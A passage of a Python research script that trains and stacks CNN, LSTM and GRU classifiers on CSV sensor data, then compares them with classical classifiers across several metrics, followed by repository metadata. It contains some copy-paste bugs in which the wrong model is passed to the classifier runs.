rate',fontsize=22, fontweight='bold')\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder, 'ROC_Curve.png'))\n plt.close('all')\n # raise Exception\n\n def run(self, csv_path):\n\n self.predictions = []\n self.create_output_folder(csv_path)\n self.create_dataset(csv_path)\n groupped = self.df.groupby(self.df.columns[-1])\n # print(self.df)\n\n all_features = None\n all_labels = None\n\n for i in self.classes_names:\n i = int(i)\n data = groupped.get_group(i)\n if not len(data) % self.group_rows == 0:\n rt_ = len(data) % self.group_rows\n data = data.iloc[:-rt_, :]\n\n df_numpy = data.to_numpy()\n df_numpy_n = df_numpy[:, :-1]\n new_df_numpy_n = df_numpy_n.reshape(\n (df_numpy_n.shape[0]//self.group_rows, self.group_rows, self.chennels))\n # print(new_df_numpy_n.shape)\n y = df_numpy[:, -1]\n y = y.reshape((new_df_numpy_n.shape[0], self.group_rows))\n y = y[:, 1]\n\n if i == 0:\n all_features = new_df_numpy_n\n all_labels = y\n else:\n all_features = np.concatenate(\n (all_features, new_df_numpy_n), axis=0)\n all_labels = np.concatenate((all_labels, y), axis=0)\n\n\n y = to_categorical(all_labels,num_classes=self.classes)\n \n \n\n self.X_train, self.X_test, self.Y_train, self.Y_test = train_test_split(\n all_features, y, test_size=0.2)\n \n \n # x_train = np.reshape(self.X_train,(*self.X_train.shape[:-2],-1))\n # x_test = np.reshape(self.X_test,(*self.X_test.shape[:-2],-1))\n \n # from minisom import MiniSom\n # som = MiniSom(64,20, 40, sigma=0.3, learning_rate=0.5) # initialization of 6x6 SOM\n # som.train(x_train, 10) # trains the SOM with 100 iterations\n # print(x_train.shape)\n # s = som.get_weights()\n # print(s.shape)\n # s= list( som.win_map(x_train).values())\n # print(len(s))\n # self.X_train = []\n # for i in s:\n # self.X_train.append(i[0])\n # self.X_train = np.array(self.X_train)\n \n # print(sn.values())\n # for i in sn:\n # print(sn[i])\n # print(sn[i].tolist())\n # # print(list(self.X_train))\n # print('sss')\n # print(self.X_train)\n\n \n print(\"Data shape:\", self.X_train.shape, self.Y_train.shape)\n\n \"\"\"\n CNN + LSTM + Bi-LSTM\n \"\"\"\n self.model = self.get_CNN(self.X_train.shape[1:])\n cnn_auc = self.train_evaluate( name = 'CNN')\n\n\n self.model = self.get_LSTM(self.X_train.shape[1:])\n lstm_auc = self.train_evaluate( name = 'LSTM')\n\n self.model = self.get_BI_LSTM(self.X_train.shape[1:])\n bi_lstm_auc = self.train_evaluate( name = 'GRU')\n\n \"\"\"\n Load all models\n \"\"\"\n CNN_model, LSTM_model, BI_LSTM_model = self.load_DL_models()\n\n \"\"\"\n train all ML models: DL_algos -> ML models\n \"\"\"\n\n print('Training: Machine learning algorithms')\n cnn_lr_acc, cnn_svm_acc, cnn_dt_acc = self.ML_classifier_train(CNN_model,'CNN')\n lstm_lr_acc, lstm_svm_acc, lstm_dt_acc = self.ML_classifier_train(CNN_model,'LSTM')\n bi_lstm_lr_acc, bi_lstm_svm_acc, bi_lstm_dt_acc = self.ML_classifier_train(CNN_model,'GRU')\n\n \"\"\"\n Stacking model: DL_algos -> stacking\n \"\"\"\n self.model = self.stacking_model(CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=self.X_train.shape[1:])\n # plot_model(self.model,to_file = os.path.join(self.output_folder,'stacked.png'))\n stacked_auc = self.train_evaluate( name = 'stacked_model')\n\n \"\"\"\n Proposed method: DL_algos -> stacking -> RBF\n \"\"\"\n cnn_fft_train,cnn_fft_test = self.get_model_features_with_FFT(CNN_model)\n lstm_fft_train,lstm_fft_test = self.get_model_features_with_FFT(LSTM_model)\n bi_lstm_fft_train,bi_lstm_fft_test = self.get_model_features_with_FFT(BI_LSTM_model)\n\n\n stacked_fft_train = np.hstack((cnn_fft_train, lstm_fft_train,bi_lstm_fft_train))\n train_shape = stacked_fft_train.shape\n self.X_train = stacked_fft_train.reshape((train_shape[0],-1))\n\n\n # stacked_fft_test = np.hstack((cnn_fft_test, lstm_fft_test,bi_lstm_fft_test))\n # test_shape = stacked_fft_test.shape\n # self.X_test = stacked_fft_test.reshape((test_shape[0],-1))\n\n # input_ = Input(shape=self.X_train.shape[1:])\n # x = Dense(32, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n # activity_regularizer = 'L1L2')(input_)\n # x = Dense(32, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n # activity_regularizer = 'L1L2')(x)\n # # x = Dense(32, activation='relu', name = 'stacking_3')(x)\n # out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n # self.model = Model(inputs=input_, outputs=out)\n # self.model.compile(optimizer=Adam(learning_rate=0.0001),\n # loss = CategoricalCrossentropy(),\n # metrics=['accuracy'])\n\n \n self.model = self.Resnet_stacking_model(CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=self.X_train.shape[1:])\n \n proposed_acc = self.train_evaluate(name = 'proposed')\n self.ROC_curve()\n\n metric = 0\n self.accuracies[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 1\n self.cohen_kappa_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 2\n self.roc_auc_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 3\n self.f1_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 4\n self.precision_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n metric = 5\n self.recall_score[self.folder_name] =[proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n\nm = Models_class__()\nfiles = sorted(glob.glob(os.path.join(input_fodler, '*.csv')))[:10]\n\n# print(files)\n\nfor file in tqdm.tqdm(files):\n print(file)\n m.run(file)\n\n\n# path = os.path.join('output','subjects_avg_acc_loss')\n# if not os.path.exists(path):\n# os.makedirs(path)\n# for i,model in enumerate(['proposed','Stacked','CNN','LSTM','BI_LSTM']):\n\n# histories = []\n# for j in range(i,i+(len(m.histories)//5)):\n# # print(len(m.histories),j)\n# histories.append(m.histories[j])\n\n# acc =[]\n# loss = []\n# val_acc = []\n# val_loss = []\n\n# for hist in histories:\n# acc.append(hist.history['accuracy'])\n# val_acc.append(hist.history['val_accuracy'])\n# loss.append(hist.history['loss'])\n# val_loss.append(hist.history['val_loss'])\n\n# acc = np.mean(acc,axis = 0)\n# loss = np.mean(loss,axis = 0)\n# val_acc = np.mean(val_acc,axis = 0)\n# val_loss = np.mean(val_loss,axis = 0)\n\n\n\n# plt.figure(figsize=(20, 15))\n# # plt.figure()\n# plt.subplot(1, 2, 2)\n# plt.plot(acc)\n# plt.plot(val_acc)\n# plt.title(f'{model} Accuracy',fontsize=26, fontweight='bold')\n# plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n# plt.ylabel('Accuracy',fontsize=22, fontweight='bold')\n# plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n# plt.xticks(fontsize=20, fontweight='bold')\n# plt.yticks(fontsize=20, fontweight='bold')\n# plt.ylim(0.0, 1.0)\n# # colors = colors\n# plt.subplot(1, 2, 1)\n# plt.plot(loss)\n# plt.plot(val_loss)\n# plt.title(f'{model} Loss',fontsize=26, fontweight='bold')\n# plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n# plt.ylabel('Loss',fontsize=22, fontweight='bold')\n# plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n# plt.xticks(fontsize=20, fontweight='bold')\n# plt.yticks(fontsize=20, fontweight='bold')\n# plt.ylim(0.0, 1.0)\n# file_path = os.path.join(path,f'{model}.png')\n# plt.tight_layout()\n# plt.savefig(file_path)\n# # plt.show()\n# plt.close('all')\n\n\n\ndef avgs_std_dev(df,name = ''):\n avgs = []\n dev = []\n for i in range(len(df)):\n avg = np.round(np.mean(df.iloc[i,1:]),4)\n avgs.append(avg)\n dev_ = np.round(np.std(df.iloc[i,1:]),4)\n dev.append(dev_)\n df['Average'] = avgs\n df['standard dev'] = dev\n\n plt.figure(figsize=(20, 15))\n plt.bar(range(len(df['Average'])),df['Average'], yerr=df['standard dev'] , alpha=0.8,\n color = ['black','brown','red','orange','yellow','limegreen','lime','cyan','teal',\n 'deepskyblue','olive','navy','violet','purple','slategray'],\n \n align='center', ecolor='black', capsize=10)\n \n plt.plot(df['Average'],linewidth=2, markersize=12)\n # ,color = 'cyan')\n # plt.legend(fontsize=15)\n plt.title('Models '+name,fontsize=26, fontweight='bold')\n plt.xlabel('Models',fontsize=22, fontweight='bold')\n plt.ylabel(name,fontsize=22, fontweight='bold')\n plt.xticks(range(len(df['models'])),df['models'],rotation = 45,fontsize=22, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.tight_layout()\n plt.ylim(0.0, 1.0)\n plt.gca().yaxis.grid(True)\n plt.savefig(os.path.join('output', name+'.png'))\n plt.close('all')\n\n return df\n\n\ndf = pd.DataFrame.from_dict(m.accuracies)\ndf = avgs_std_dev(df,name = 'accuracies')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','accuracies.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.cohen_kappa_score)\ndf = avgs_std_dev(df,name = 'cohen_kappa_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','cohen_kappa_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.roc_auc_score)\ndf = avgs_std_dev(df,name = 'roc_auc_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','roc_auc_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.f1_score)\ndf = avgs_std_dev(df,name = 'f1_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','f1_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.precision_score)\ndf = avgs_std_dev(df,name = 'precision_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','precision_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.recall_score)\ndf = avgs_std_dev(df,name = 'recall_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','recall_score.csv'),index = False)\n\n# !zip -r /content/output.zip /content/output", "repo_name": "Rehan0546/deeplearning_models_stacking", "sub_path": "subject_classification.py", "file_name": "subject_classification.py", "file_ext": "py", "file_size_in_byte": 37874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "warnings.filterwarnings", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Layer", "line_number": 53, "usage_type": "name"}, {"api_name": "keras.backend.cast_to_floatx", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 57, "usage_type": "name"}, {"api_name": "keras.backend.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 67, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.backend.pow", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.backend.exp", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 69, "usage_type": "name"}, {"api_name": "scipy.stats.ttest_rel", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 199, "usage_type": "call"}, {"api_name": "sklearn.metrics.cohen_kappa_score", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 201, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 204, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 206, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 208, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 212, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 239, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 241, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 255, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 261, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 262, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 266, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 275, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 278, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 289, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 291, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 301, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 303, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 306, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 309, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 310, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 314, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 316, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 318, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 324, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 330, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.EarlyStopping", "line_number": 338, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 366, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 366, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 374, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 374, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 376, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 390, "usage_type": "call"}, {"api_name": "os.path", "line_number": 390, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 393, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 393, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path", "line_number": 393, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 397, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 397, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 402, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 443, "usage_type": "call"}, {"api_name": "os.path", "line_number": 443, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 445, "usage_type": "call"}, {"api_name": "os.path", "line_number": 445, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 446, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 461, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.concatenate", "line_number": 466, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 467, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 469, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 471, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 473, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 474, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 475, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 483, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 489, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 491, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 493, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 494, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 495, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 495, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.concatenate", "line_number": 497, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 507, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 512, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 521, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 521, "usage_type": "call"}, {"api_name": "os.path", "line_number": 521, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path", "line_number": 523, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 540, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 543, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 548, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 555, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 555, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 563, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 568, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 576, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 576, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 609, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 610, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 610, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 612, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 612, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 613, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 613, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 618, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 618, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 619, "usage_type": "call"}, {"api_name": 